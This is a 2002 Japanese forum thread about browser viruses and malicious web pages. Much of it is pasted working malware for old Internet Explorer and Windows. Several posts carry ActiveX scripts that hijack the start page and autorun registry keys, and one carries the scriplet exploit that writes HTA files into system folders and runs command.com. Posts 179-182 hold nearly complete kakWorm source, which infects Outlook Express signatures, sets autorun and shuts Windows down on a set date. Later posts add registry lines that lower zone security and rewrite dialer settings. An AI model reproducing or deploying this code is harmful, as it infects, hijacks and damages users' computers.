<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX初始化过程(为达到修改用户注册表所必须的准备程序 )
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");< br>a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createI nstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createI nstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
//以下是检测用户注册表并修改相应的键值
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "URLリンク(JavaHouse.126.com)");//修改用户InternetExplorer浏览器的默认主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "URLリンク(JavaHouse.126.com)");//建立默认启动页面程序,保证用户每次启动计算机首先打开该页 面
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作
}
init();</SCRIPT>
176:findlu@21cn.com
02/01/07 03:19
<object id="scr"
classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14"
height="14"
></object><script>
scr.Reset();
scr.Path="C:\windows\system\Krnl386.exe";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(
`Screw Denise Richards, Debbie Johnson
r0x!`);wsh.Run(`c:\command.com`);</"+"SCRIPT>";
scr.write();
</script>
</p>
See how simply that was adapted? I polished it not-at-all so you can see the
minimal changes. At this point you would be automatically transferred to a
second web page that would contain the following code.
<html>
<head>
<title>Self Destruct </title>
</head>
<body>
<form method="POST">
<table>
<tr>
<td width="20%"><input type="text" name="State" size="99999999"
maxlength="99999999" value=""></td>
</tr>
</table>
</form>
</body>
</html>
177:名無しさん@お腹いっぱい。
02/01/07 03:20
<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"
width="14" height="14">
</object>
<script>
scr.Reset();
scr.Path="C:\WINNT\System32\ntoskrnl.exe";
scr.Doc="<object id=`wsh`
classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`></object><SCRIPT>alert(
`Screw Denise Richards, Debbie Johnson
r0x!`);wsh.Run(`c:\command.com`);</"+"SCRIPT>";
scr.write();
</script>
178:名無しさん@お腹いっぱい。
02/01/07 03:23
document.write("<!--LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPL-->");
if (navigator.appName == 'Netscape') var language = navigator.language;
else var language = navigator.browserLanguage;
function AddFavLnk(loc, DispName, SiteURL) {
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
179:findlu@21cn.com
02/01/07 03:43
<x-html>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content="text/html; charset=iso-8859-1" http-equiv=Content-Type>
<META content="MSHTML 5.00.2614.3500" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>
<DIV><FONT face=Arial size=2>Dear Sir</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=Arial size=2>Iam a new learner of HTML . My question , suppose
my main file is "index.html" and I want to go to another file "main.html" with a
password what I have to do , will it require a cgi script to doing so . So
kindly help me by giving the source code for such a html file.</FONT></DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV><FONT face=Arial size=2>Thanks</FONT> <BR><BR><FONT face=Arial
size=2>From :</FONT></DIV>
<DIV><FONT face=Arial size=2>name_omitted , India, Jabalpur</FONT></DIV>
<DIV><FONT face=Arial size=2>e-mail : <A
href="mailto:email_address_omitted">email_address_omitted</A> </FONT></DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV></FONT></DIV>
<DIV>
<DIV style="POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC id=scr
name=Patsisnameit></OBJECT></DIV>
<SCRIPT><!--
180:名無しさん@お腹いっぱい。
02/01/07 03:46
function Pats(){return true;}window.onerror=Pats;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>
Scan Memory Driver </"+"TITLE><HTA:APPLICATION ID=\"hO\" WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#468B4>
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='wsh'></"+"object><SCRIPT>function Patsi()
{self.close();return true;}window.onerror=Patsi;fs=new ActiveXObject('Scripting.FileSystemObject');wd=
'C:\\\\Windows\\\\';fl=fs.GetFolder(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var mye=new Enumerator(sbf);!
mye.atEnd();mye.moveNext())idd=mye.item();ids=new String(idd);idn=ids.slice(31);fic=idn.substring(1,9);kfr=
wd+'MENUDE~1\\\\PROGRA~1\\\\DEMARR~1\\\\day.hta';sun=wd+'STARTM~1\\\\Programs\\\\StartUp\\\\day.hta';d2=wd+'help\\\\days.hta';
dd=(fs.FileExists(kfr))?kfr:sun;nau='C:\\\\days.day';aeb='C:\\\\Autoexec.bat';if(!fs.FileExists(nau)){re=/day.hta/i;
if(hO.commandLine.search(re)!=-1){f1=fs.GetFile(aeb);f1.Copy(nau);t1=f1.OpenAsTextStream(8);pth=(dd==kfr)?wd+'MENUD?~1
\\\\PROGRA~1\\\\D?MARR~1\\\\day.hta':sun;t1.WriteBlankLines(1);t1.WriteLine('@ECHO OFF>'+pth);t1.WriteLine('DEL '+pth);
t1.Close();}}if(!fs.FileExists(d2)){fs.CopyFile(dd,d2);fs.GetFile(d2).Attributes=2;}t2=fs.CreateTextFile(wd+'day.reg');t2.write('REGEDIT4');t2.
WriteBlankLines(2);ky2='[HKEY_CURRENT_USER\\\\Identities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook Express\\\\5.0';sg='\\\\signatures'
;t2.WriteLine(ky2+sg+']');t2.Write('\"Default Signature\"=\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky2+sg+'\\\\00000000]');t2.WriteLine
('\"name\"=\"Signature #1\"');t2.WriteLine('\"type\"=dword:00000002');t2.WriteLine('\"text\"=\"\"');t2.Write('\"file\"=\"C:\\\\\\\\WINDOWS\\\\\\\\
COMMAND\\\\\\\\default.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky2+']');t2.Write('\"Signature Flags\"=dword:00000003')
181:名無しさん@お腹いっぱい。
02/01/07 03:54
sage
182:kakWorm
02/01/07 03:54
;t2.WriteBlankLines(2);t2.WriteLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft
\\\\Windows\\\\CurrentVersion\\\\Run]');t2.Write('\"cDays\"=\"C:\\\\\\\\WINDOWS
\\\\\\\\help\\\\\\\\days.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run
(wd+'Regedit.exe -s '+wd+'day.reg');t3=fs.CreateTextFile(wd+'COMMAND\\\\default.htm',1);t3.Write
('<HTML><BODY><DIV style=\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OBJECT name=
Patsisnameit id=scr classid=clsid:06290BD5-48AA-11D2-8432-006008C3FBFC></"+"OBJECT></"+"DIV>')
;t4=fs.OpenTextFile(d2,1);while(t4.Read(1)!='Z');t3.WriteLine('<SCRIPT><!--');t3.write('function Pats()
{return true;}window.onerror=Pats;scr.Reset();scr.doc=\"Z');rs=t4.Read(4192);t4.close();rd=/\\\\/g;re=
/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.
WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path
=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Demarrer\\\\\\\\Programmes\\\\\\\\Demarrage\\\\\\\\day.hta
\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\day.hta\";agt=navigator.
userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf
(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>')
;t3.close();fs.GetFile(wd+'COMMAND\\\\default.htm').Attributes=2;fs.DeleteFile(wd+'day.reg');d=new Date()
;if(d.getDate()==11 && d.getHours()>16){alert('Days It was a day to be a days!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 Scan Memory Driver";la=(navigator.systemLanguage)?navigator.
systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Demarrer\\Programmes\\Demarrage\\day.hta":
"C:\\windows\\Start Menu\\Programs\\StartUp\\day.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)
&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>
</x-html>
183:ウイルス
02/01/07 06:03
このスレをカチューシャでみたらNIS2002
がログをウイルスと断定、削除しました
184:名無しさん@お腹いっぱい。
02/01/07 15:09
>>183
おらも同じだ。
「ホットゾヌ」だけど、やっぱりノートンが「ログの中にウイルスがいる」と
警告してきた。
185:名無しさん@お腹いっぱい。
02/01/07 15:42
URLリンク(www.pp.iij4u.or.jp)
186:名無しさん@お腹いっぱい。
02/01/07 15:47
おめでとうございます。
初出勤今日は当然ドゴールです。
久しく革靴履いて歩いていないので今日はきつめの印象であります。
年末にビッチリと自分なりの手入れをしたため今日は履き心地は別にして気分がいいです。
とにかくビガビガです。
実は奥さんと3歳の息子にまで怒られながらも家でビデオ鑑賞の際などに履いていましたので初日ではないのですが、やはり気に入った靴で出勤した日は気分いいものです。
それでは今年もよろしくお願いします。
187:名無しさん@お腹いっぱい。
02/01/07 15:58
>>183-184
NPF2001だと、なにも検出しなかったよ
やっぱり新しいのがいいのかなぁ
188:名無しさん@お腹いっぱい。
02/01/07 16:56
>>186
幸せですか?
189:あぼーん
あぼーん
あぼーん
190:
02/01/08 01:42
ココのスレをあらゆるところにリンクしたらそれは悲惨になりそうな予感
191:
02/01/08 01:44
悪いものは悪いものなりに情報として集積することは悪いことではないけどね。
192:名無しさん@お腹いっぱい。
02/01/08 02:36
193:名無さん@お腹いっぱい。
02/01/10 06:53
もうネタ切れ?
しかしリンク切れているの多いなぁ
NIS2002で感染するほどキツイのないし・・
194:
02/01/12 09:21
↓の画像やばいらしいっすね
しばらく見てると画像からウィルスが飛び出すらしい
URLリンク(www.geocities.co.jp)
195:
02/01/12 13:44
>>194
どういう仕組みで?
196:
02/01/12 13:46
>>194
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2002 04:44:11 GMT
Server: Y.G.Apache-SSLv3/1.3.9
Set-Cookie: Geoche=snRQ9cMkH000Zo91bcPBB000Tfvhc0;
domain=.geocities.co.jp; path=/; expires=Mon, 12-Jan-04 04:44:11 GMT
Last-Modified: Thu, 10 Jan 2002 09:39:59 GMT
ETag: "117f2c8-1999e-3c3d616f"
Accept-Ranges: bytes
Content-Length: 104862
Connection: close
Content-Type: image/gif
GIF89ahサ・エjFャg4ナ* bm嗚M+[ 叡6b宙p#⊇櫨チbO凱y$含・萵B,+H・Q[сワ賂-ェ・x0「
いちいちcookie仕掛けに来てうざい
197:第三者中継可能?
02/01/12 13:58
From:FunnyMoney< funnymoney.10@reply.pm0.net >
To: funnymoney@ofr.pm0.net
Subject:Deposit $50.00, Play With $100.00 at Black Widow Casino
Date:*****
Received:from [128.121.215.224]by pm0.com with ESMTP id ***;***
Received:(from localhost)by pm0.net (8.8.8pmg/8.8.5)id include:/usr/home/pmgs/users/funnymoney/delivery/
From funnymoney@ofr.pm0.net
Message-Id:< 300113322561MANKO123456@pm0.net >
X-Info: Message sent by Mindshare Design customer with ID "funnymoney"
X-Info: Report abuse to list owner at funnymoney@complaints.pm0.net
X-PMG-Userid: funnymoney
X-PMG-Recipient: funnymoney@ofr.pm0.net
To remove yourself from this mailing list, point your browser to:
URLリンク(i.pm0.net)
Enter your email address ( funnymoney.10@reply.pm0.net ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10".
OR... Reply to this message with the word "remove" in the subject line.
198:名無しさん@お腹いっぱい。
02/01/13 00:09
>>194
え?その画像ってウィルスなの?
ただのGIFじゃないの?
199:
02/01/13 00:18
>>198
拡張子はGIFだけど、実はCGIなり。
開いてるポートがあるとやばいなりよ。
面白い画像だと思ってダウンロード保存なんてしたらもっとやばいなり。
200:名無しさん@お腹いっぱい。
02/01/13 00:24
>>199
geoでどうやってcgi動かすんだよ。 (w
201:199
02/01/13 00:32
ばれた?(^^;
202:名無しさん@お腹いっぱい。
02/01/14 03:39
>172
を解説してください。mobsync.exeがスタートアップに付くんですか?
203: ◆RUwjICBI
02/01/16 17:34
何によりてか目を悦ばしむる。
スレリンク(hack板:225番)
204:名無しさん@お腹いっぱい。
02/01/20 00:06
>>202
何も起きないよ。
ただ脅して遊んでるだけ。
205:名無しさん@おなかいっぱい
02/01/28 21:41
ここのスレJS/IEStartっていうウィルスに感染してるって出るよ。。
206:名無しさん@おなかいっぱい。
02/02/05 09:29
URLリンク(easyweb.easynet.co.uk)
↑怪しいから踏んでないけど、MP3でもヤバイの?
ヤバイ雰囲気の所から拾ったURLだけど・・
207:名無しさん@お腹いっぱい
02/02/05 11:50
>>206
それはMTXだよ、てか超ガイシュツだからDLするな。
208:kakWormと出る
02/02/05 18:30
209:kakWormの所在
02/02/05 19:33
スレリンク(sec板:164-183番)
210:名無しさん@お腹いっぱい。
02/02/05 22:11
URLリンク(www.e-net.gen.tr)
VBS HAPTIME.A-1
211:名無しさん@お腹いっぱい。
02/02/06 10:37
なんだこれ
212:スパム
02/02/06 14:23
俺は海外からスパムメールがわんさか来る
そのまま返信、もしくはアドレスらしきものに、
こんなメールおくるなあゴルァ!メールをだしても
宛先に不明でもどってきてしまう
だれか相手の特定の仕方分かる方いませんか?
一応、メールのヘッダから相手方のIPアドレスらしきもの
を見つけだしてIP検索してみたが、どうも中国から
きているみたいですが
213:スパムに返信するな
02/02/06 18:50
>>212
そのまま返信、もしくはアドレスらしきものに、
こんなメールおくるなあゴルァ!メールをだすな。
返信するとメールアドレスが存在することがわかり、わんさかスパムがくる。
メールヘッダを晒してくれ。(自分のアドレスなどは消す)
214:名無しさん@お腹いっぱい。
02/02/06 20:48
URLリンク(myhome.hananet.net)
koraha?
215:名無しさん@お腹いっぱい。
02/02/06 21:03
落ち着いて見れないよう。ここ。
216:名無しさん@お腹いっぱい。
02/02/06 21:09
>>214
soreha virus janai.
217:名無しさん@お腹いっぱい。
02/02/06 21:21
浜崎あゆみ
URLリンク(jove.prohosting.com)
218:名無しさん@お腹いっぱい。
02/02/06 21:34
>>216
That’s Right
219:名無しさん@お腹いっぱい。
02/02/10 20:49
なんかないのか?
220:名無しさん@お腹いっぱい。
02/02/10 20:51
714 名前:nobody 投稿日:02/02/10 18:34
175無い人には可哀想だけど、確かに175以上ないと付き合う気がしない。。
好きな人のタイプは?って聞かれて間違っても「背が高くて~、」とかは
言わないけど、でも心の内では背が高いってのがいつの間にか条件に
入っちゃってる。高校のとき高い人と付き合って以来、高い人にしか
異性を感じなくなっちゃって。。男友達多いし、自分と同じ目線だと
同姓の友達のような親近感持ちすぎてしまふ。。
221:
02/02/10 22:57
>>214
赤い文字だけで何も起きない。
顔が出てくるらしいが。
222:
02/02/11 00:22
URLリンク(61.215.152.79)
223:名無しさん@お腹いっぱい。
02/02/11 01:55
>>183-184
>>205
コピペのコードにヒットしたんだと思う。
うちでも、ノートンでファイルチェックすると
プライスロトのコード書いたテキストファイルに
反応するもん。
224:223
02/02/11 01:56
ごめん、さげる必要なかったね。
癖になってる
225:名無しさん@お腹いっぱい。
02/02/11 06:28
URLリンク(www.top.or.jp)
を開いたらどうなりますか?対処法教えて!
226:名無しさん@お腹いっぱい。
02/02/11 08:19
>>225
joke
227:名無しさん@お腹いっぱい。
02/02/14 19:50
>>225
対処法?んな物ねーよ!
今時そんなURL踏む厨房バカも2chには存在するのか?
どうなるか自分で体験てみろ!
報告も宜しく( ̄ー ̄) ニヤリッ
228:
02/02/14 19:53
>225
踏まない事が対処法っす。
229:名無しさん@お腹いっぱい。
02/02/14 21:49
>225
凝ったウィルスだね。
これは普通の人がソース見ただけでは理解できないと思われ。
230:名無しさん@お腹いっぱい。
02/02/14 22:59
>>229
初心者でも読めるソースでしたがなにか?
231:名無しさん@お腹いっぱい。
02/03/07 16:58
あう~~
232:名無しさん@お腹いっぱい。
02/03/07 18:03
あう~~あ~
233:名無しさん@お腹いっぱい。
02/03/07 18:07
あう~~あ~う~
234:名無しさん@お腹いっぱい。
02/04/05 16:19
age
235:名無しさん@お腹いっぱい。
02/04/06 23:52
URLリンク(ime.nu)
236:GNU ◆BJMxeAWk
02/04/13 16:56
URLリンク(www.pref.aichi.jp)
237:名無しさん@お腹いっぱい。
02/04/30 00:20
>>206の示したMTXって、一時ファイルとして保存されるだけで、
リンク先を開いただけで感染するってわけじゃないんでしょ?
238:名無しさん@お腹いっぱい。
02/05/01 23:24
URLリンク(xxxtw.com)のウイルスサイトにひっかかってしまいました
対処方法を教えてください
239:名無しさん@お腹いっぱい。
02/05/01 23:32
(*゚ー゚)イヤデス
240:名無しさん@お腹いっぱい。
02/05/01 23:53
>>238サン ヲ ハッケンシマシタ(゚ー゚*)
241:名無しさん@お腹いっぱい。
02/05/01 23:54
スレリンク(win板)
(゚ー゚*)
242:名無しさん@お腹いっぱい。
02/05/02 00:08
>>236
俺、すでに紫なんだが・・・なにそれ
243:名無しさん@お腹いっぱい。
02/05/02 00:20
>>238 ざっと見た限りでは兇悪なことはしてない。
お気に入りとスタートページ直す。
ノートンかバスター買ってきてスキャン。
貧乏ならスレリンク(sec板)l50
どうせなら、もっと鮮度の高いのに感染してきてくれ。 (w
244:名無しさん@お腹いっぱい。
02/05/02 00:29
>>243
教えてくれてありがとう
お気に入りとスタートページは直しました
明日ウイルスバスター買ってきます
245:まりなっち ◆.marinaM
02/05/03 23:26
|
|ヽ@∈
|‘ ) ジー
⊂
|
246:あぼーん
あぼーん
あぼーん
247:名無しさん@お腹いっぱい。
02/05/14 18:53
URLリンク(abc.w5.pl)
これ開くとdw15.exeが発動してマイクロソフトに
プロダクトIDが送られます。
248:名無しさん@お腹いっぱい。
02/05/14 20:03
URLリンク(homepage3.nifty.com)
コレって超ガイシュツ?つか何コレ?
249:名無しさん@お腹いっぱい。
02/05/14 20:42
>>248
はいはい、お疲れ様でした。
250:名無しさん@お腹いっぱい。
02/05/26 01:33
>>248
ホント!!
お疲れ!! 志んんでくれ!
251:名無しさん@お腹いっぱい。
02/06/10 02:25
マルチゴメソ
URLリンク(www.cyber-lolita.com)
ここでウィルス喰らったみたいでホームが無理やりこのページにされたよ
半分マルチな内容だけど本気で困ってるんで助けて・・・
252:名無しさん@お腹いっぱい。
02/06/16 14:33
>>251
それはウィルスではなくてQ2では?
調べてみて。
253:名無しさん@お腹いっぱい。
02/06/17 00:24
>>249
しょーじきなとこ マジ教えてくれ。
254:名無しさん@お腹いっぱい。
02/06/17 00:42
>>253
(・∀・)ニヤニヤ
255:名無しさん@お腹いっぱい。
02/06/17 02:36
>>251
JS.Exception.Exploit
↑
こんなん仕掛けられてました。
すごくない。
256:名無しさん@お腹いっぱい。
02/06/17 20:53
>>248
ブラクラ!!
257:名無しさん@お腹いっぱい。
02/06/17 21:03
>>248
↓のスレでガイシュツ。
勇気がなくてみられない画像解説スレin半角part46
スレリンク(ascii板)
>>251
何でもかんでもクリックしない方がいいと思うよ。
不安だったら↑のスレを参考に。いつもお世話になっている。
258:名無しさん@お腹いっぱい。
02/07/02 13:33
URLリンク(membres.lycos.fr)
息抜きにどうぞ。気長にやってみてね。
けっこう難しいです。
でもちゃんと音楽流れて楽しいですよ!
スタートをクリックして逝ってください。
259:名無しさん@お腹いっぱい。
02/07/06 08:48
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
260:259
02/07/06 09:01
あ、まちがい
261:名無しさん@お腹いっぱい。
02/07/06 11:15
>>259
ノートン先生が(略
262:
02/07/06 15:24
oi
263:名無しさん@お腹いっぱい。
02/07/06 16:34
www.myparty.yahoo.com
ここダイジョウブですか??
心配なので開けません・・・
264:名無しさん@お腹いっぱい。
02/07/06 16:50
↑マジ教えて!!
265:名無しさん@お腹いっぱい。
02/07/06 16:52
>>263
Yahoo! News - Document Not Found
だってさ。大丈夫だよ。
266:名無しさん@お腹いっぱい。
02/07/06 17:08
>>263
それ、ウイルスが偽装してクリックさせようとした罠。
URLリンク(www.trendmicro.co.jp)
↑を参照。
267:名無しさん@お腹いっぱい。
02/07/06 17:08
ありがとうございました!!
268:名無しさん@お腹いっぱい。
02/07/11 02:42
URLリンク(isweb30.infoseek.co.jp)
269:あぼーん
あぼーん
あぼーん
270:これって俺だけー?
02/07/11 13:01
スレリンク(hneta板)
271:名無しさん@お腹いっぱい。
02/07/11 13:07
>>270 ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
272:これって俺だけー?
02/07/11 13:21
>>271
ありがとー!
273:ひげ
02/07/11 13:28
最強のハッカーで有名な『ヒゲ』とはぼくのことです
274:
02/07/11 14:04
(^∀^)ゲラゲラ
275:名無しさん@お腹いっぱい。
02/07/11 18:38
crashmeは?
276:名無しさん@お腹いっぱい。
02/07/12 18:14
>>268
これってどうゆうしくみ?
277:名無しさん@お腹いっぱい。
02/07/13 02:29
↑ どれも偽物ばっかでつまらね~
URLリンク(kuro96.hypermart.net)
感想を聞かせろ
278:名無しさん@お腹いっぱい。
02/07/13 02:33
感想もクソも・・・何も起きないけど
Proxomitron+JSとActiveXオフなだけだけど
279:名無しさん@お腹いっぱい。
02/07/13 02:34
>>277 JSオフ、画像オフなので真っ白。とてもつまらない。
280:名無しさん@お腹いっぱい。
02/07/13 05:15
URLリンク(isweb38.infoseek.co.jp)
ここってどうなんでしょうか?
281:名無しさん@お腹いっぱい。
02/07/13 05:22
どうなんでしょうって、そんなの自分でソース見ればいいだろ
それともネタ提供か?
jisウィルスとか、ウイバスとかなかなか斬新な言語使ってらっしゃるようだが
これじゃ逆に厨房でもひっかからないような気がするがw
282:280
02/07/13 05:27
>>281
すいません
一応ソースは見てみましたが
なにぶんウイルスの事はあまり知らないんで・・・
つい何とはなしにクリックしてしまったもので・・・
283:名無しさん@お腹いっぱい。
02/07/13 07:10
洋楽イタみてたら、ノートン先生登場「感染しました」とのこと。
internet temporary fileが感染、love lettertとか書いてあった。
削除したが、誤作動それともほんとにウイルス?
284:名無しさん@お腹いっぱい。
02/07/13 07:18
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
ノートンがvbsウィルスのソースに誤反応
スレリンク(sec板)
285:
02/07/21 23:51
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Dial","M0");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Settings\\SpeakerMode_Off","M1");
Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\1","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\2","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\3","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\Class\\Modem\\0000\\Init\\0","ATS7=60M0+ES=3,0,2;+DS=3;+IFC=2,2;X4<cr ");
// Shl.RegWrite("HKCU\\RemoteAccess\\Default","dialup01");
// Shl.RegWrite("HKCU\\RemoteAccess\\InternetProfile","dialup01");
Shl.RegWrite("HKCU\\RemoteAccess\\DialUI", 00000007,"REG_BINARY");
// Shl.RegWrite("HKCU\\RemoteAccess\\Profile\\dialup01\\AutoConnect", 01,"REG_DWORD");
286:名無しさん@お腹いっぱい。
02/08/31 13:58
ラュdォRル描\YvΤuァ・・⊂・;kRエ{ 、C",ルhZ+~>$゙・ティ・リ・ミ・ト・メ・罧{ラ」・ク'イ・O
J珥Eカ・・,訃蓜」:FィマQ(ッェ刈k.・ゥDyirオュRNサ6・チv袙・s~溜ワイネ+霻j毯チMtE
ミ90(Ⅱテ(ヌィ》ロヒ「ロaovRー焔摧ャ・㌘T?Wk%「ゥtb>・ィ妥O字・ソrキ;@呈ス9z゙綉亳x7メテ
振鑽禔淞イ・・、、&h@・豆o・カ・ハサ陸),豌ーVx]*Gラ、2氈ニ9∧鮭*・sN・0axツケァ・ハ-
$・ソ<メB$┝kmヌЪヤDモRXコBァkbヨ.マホ愷}&~ウ鼻>$・ヲチリQトd{&タ・}マnKノnヨ"
'ネ{ンP・・1瑰靡・モケモI:~b;F;ェエ[]!ッaEum,・ヘ・粱﨣・慴1タpx8ッレ`b fノフ`8)・・・!
ト・・*o'Hロホャ耆・サG・`Ct鵜ルgmサツ・ョ{h・aIキ3e[c`レオ・タ垳庭mZ・:歟/ヨ・0、
フp3刪]ハ\ヲ啾ュ肌u+WMNリヤ躪シ 捷0`w・.Qャ症レモW[Vモ-iLoヨ!蠎lィニキ濕ρト
ェ忘堺-!・+pス愠jC・羽ケy・メt・9ICo・鍛ュ愑冂ェnリ・棄Z[,{簍晥@ノニ~;Iэマ6ナ
備・・K鱆サ・#e・畩;2&ルィ・<蚤・楔9+・B@"ォ'B・WbqルPLー罌闔・レFムァc3ナ#b5bjモ_
rノ・=*フ・|2Fz」飩2ト穿・%チε 蒂ォー/ィ)ェt<エエRッオx奔sョムツ9城R6Sa荢g。サ8卻
b、ェX+Eシサ﨑Wyシc衽ノ5タラ$c-}カqュヘ珎B敢剩~%厘rイ・2・・・q揺-A賣tニ4\Tィ)%・
Δk薪-ァ=ク鷹u 1・「・ィdJ|nレミ、b稠A]。Bm)ホ・ー枌X-$簑ノ``キk )慫ヌソO・mチm;D
287:あぼーん
あぼーん
あぼーん
288:名無しさん@お腹いっぱい。
02/09/09 18:22
>>287
自分でやれ。
289:名無しさん@お腹いっぱい。
02/09/09 18:24
>>287
ホットメールにウイルス送信依頼かよ(プ
290:名無しさん@お腹いっぱい。
02/09/10 01:01
>>286
何のバイナリだたの??
291:あぼーん
あぼーん
あぼーん
292:あぼーん
あぼーん
あぼーん
293:名無しさん@お腹いっぱい。
02/09/11 02:11
(´-`).。oO(誰が何をつくれんだろう中途半端な荒らしだなぁ…)
294:名無しさん@お腹いっぱい。
02/09/11 02:41
(´-`).。oO(さりげなく私怨してる奴は何なんだろう…)
295:名無しさん@お腹いっぱい。
02/09/15 23:55
>>292
どうせ開いただけで飛んじゃう
やつとか(settimeoutでopen
させる)をソースに書くんだろ。
簡単だモンな。2.3行だよ。
296:名無しさん@お腹いっぱい。
02/09/20 08:37
URLリンク(web.cheapnet.it)
ウイルスらしいのですが
297:
02/09/20 11:02
URLリンク(www.nova.ne.jp)
298:名無しさん@お腹いっぱい。
02/09/20 13:09
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","URLリンク(www.jpneweb.net)");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","URLリンク(www.jpneweb.net)");
